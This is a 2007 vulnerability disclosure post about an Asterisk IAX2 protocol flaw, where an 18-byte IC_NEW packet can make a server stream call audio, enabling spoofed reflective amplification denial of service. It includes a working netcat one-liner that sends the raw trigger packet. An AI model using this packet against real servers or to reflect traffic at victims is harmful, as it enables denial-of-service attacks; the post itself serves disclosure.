IAX2 protocol flaw in IC_NEW could cause reflective amplification DoS


by Joel R. Voss aka. Javantea
jvoss@altsci.com
jvoss@myuw.net
May 15, 2007
Official Asterisk bug report

UPDATE April 18, 2008

I am releasing the full Asterisk IAX2 exploit framework / alternative implementation. I am giving a talk at Toorcon Seattle 2008 about my findings. Read more about the handshake (and it's failure) at that page.

UPDATE Jan 17, 2008

Although the Asterisk team described a bugfix and mentioned intention to fix this bug, this bug has not been fixed as of Jan 17, 2008 (Tested against 1.4.17). Since the exploit code is widely available through this website, it would seem prudent to fix this if it were indeed a fixable bug. However, it is my opinion that introducing a handshake requirement to the IAX2 protocol would make the protocol far less likely to work with third-party software and hardware.

I am running a vulnerable version at suzy.altsci.com for test (as well as development and actual use) and I intend to keep it running for the purpose of education and disclosure of this vulnerability.

DESCRIPTION

The IAX2 protocol allows an IC_NEW packet to start a call. This is a udp packet that is only 18 bytes long. A call can be quite long and contains a lot of data. Specifically my simple answering machine sends 26307 bytes in 723 packets in 32.0032 seconds. That is 6576.75 bits per second. Using uLaw or another higher bitrate codec, this rate can be increased.

Since UDP can be spoofed, it seems possible that an asterisk server can be tricked into sending megabits per second (until it chokes) at a target with a very low cost to the attacker (18 byte udp packet). I have not tested spoofing an address, but I suspect that it will work.

Since this is a protocol flaw and there are hardware implementations that would be broken by changing the protocol, this does not seem to be fixable. If someone with knowledge of these type of issues could discuss this with me, I would be much more confident in this.

I wrote a python implementation of IAX2 protocol to fuzz the IAX2 protocol and I found this by accident in my first test. If you are interested in fuzzing the IAX2 protocol, I would be happy to share my code with you. I even have a gsm decoder for the project which lets you hear what the fuzzer made the Asterisk box do.

REQUIREMENTS

You need netcat to run the exploit below.
You might need these to research this better:
TCP Dump and libpcap
Wireshark

METHODS

More detailed information coming soon.
Until then, look at the latest internet draft.

USAGE
echo -ne '\x80\xeb\x00\x00\x00\x00\x00\x07\x00\x00\x06\x01\x08\x04\x00\x00\x02\xaa' | nc -u 192.168.0.3 4569

More detailed information coming soon. If you're interested in developing Asterisk exploits, e-mail me with or without GnuPG.

Permalink

Comments: 0

Leave a reply »

 
  • Leave a Reply
    Your gravatar
    Your Name